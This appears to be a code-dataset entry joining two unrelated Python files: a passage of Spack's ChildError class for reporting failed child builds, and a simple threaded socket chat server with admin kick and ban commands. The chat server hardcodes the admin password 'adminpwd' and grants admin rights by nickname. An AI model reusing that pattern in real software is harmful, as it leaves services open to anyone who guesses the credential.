1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
# The error happened in in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s\n' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
|
server.py
|
import threading
import socket
#define host address, port number
host = '127.0.0.1' #localhost (can also be the ip of the server if it's running on web server)
port = 49800 #random port - not from well-known ports (0-1023) or registered ports (1024-49151)
#starting the server
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port)) #bind server to host and ip address
server.listen() #listen for incoming connections
#client and nickname lists
clients = []
nicknames = []
#broadcast function - sends message to all connected clients
def broadcast(msg):
for client in clients:
client.send(msg)
#handle function - handles messages from clients
def handle(client):
while True:
try:
special_msg = msg = client.recv(1024) #special_msg for kick or ban
if special_msg.decode('ascii').startswith('KICK'):
if nicknames[clients.index(client)] == 'admin':
user_to_kick = special_msg.decode('ascii')[5:] #after the first 5 characters (kick+space)
kick_user(user_to_kick)
else:
client.send('Command was refused!'.encode('ascii'))
elif special_msg.decode('ascii').startswith('BAN'):
if nicknames[clients.index(client)] == 'admin':
user_to_ban = special_msg.decode('ascii')[4:] #after the first 4 characters (ban+space)
ban_user(user_to_ban)
with open('banned_users.txt','a') as bu:
bu.write(f'{user_to_ban}\n')
print(f'{user_to_ban} was banned from the server!')
else:
client.send('Command was refused!'.encode('ascii'))
else:
broadcast(msg) #broadcast the message to all other clients
except:
if client in clients:
index = clients.index(client) #remove client from the list
clients.remove(client)
client.close()
nickname = nicknames[index]
nicknames.remove(nickname)
broadcast(f'{nickname} has left the chat.'.encode('ascii'))
break
#receive function
def receive():
while True:
client, address = server.accept() #accept method returns a client and his address
print("Connected with {}".format(str(address)))
client.send('nick'.encode('ascii')) #message visible only to the client to give his nickname
nickname = client.recv(1024).decode('ascii')
with open('banned_users.txt','r') as bu:
bans = bu.readlines()
if nickname+'\n' in bans: #refuse connection to banned client
client.send('BAN'.encode('ascii'))
client.close() #close connection to the client
continue
if nickname == 'admin':
client.send('PASS'.encode('ascii'))
password = client.recv(1024).decode('ascii')
if password != 'adminpwd':
client.send('REFUSE'.encode('ascii'))
client.close()
continue
nicknames.append(nickname) #add nickname to nicknames list
clients.append(client) #add client to clients list
print(f'Nickname of the client is {nickname}.')
broadcast(f'{nickname} has joined the chat!'.encode('ascii'))
client.send("Connected to the server!".encode('ascii')) #let the client know that he has connected successfully to the server
thread = threading.Thread(target=handle, args=(client,)) #one thread per client connected to handle them at the same time
thread.start()
def kick_user(user):
if user in nicknames:
user_index = nicknames.index(user) #find the position of user in nicknames which is the same position as the client
client_to_kick = clients[user_index]
clients.remove(client_to_kick)
client_to_kick.send('You were kicked from the server by the admin.'.encode('ascii'))
client_to_kick.close()
nicknames.remove(user)
broadcast(f'{user} was kicked from the server by the admin!'.encode('ascii'))
def ban_user(user):
if user in nicknames:
user_index = nicknames.index(user) #find the position of user in nicknames which is the same position as the client
client_to_ban = clients[user_index]
clients.remove(client_to_ban)
client_to_ban.send('You were banned from the server by the admin.'.encode('ascii'))
client_to_ban.close()
nicknames.remove(user)
broadcast(f'{user} was banned from the server by the admin!'.encode('ascii'))
print("Server is listening...")
receive()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.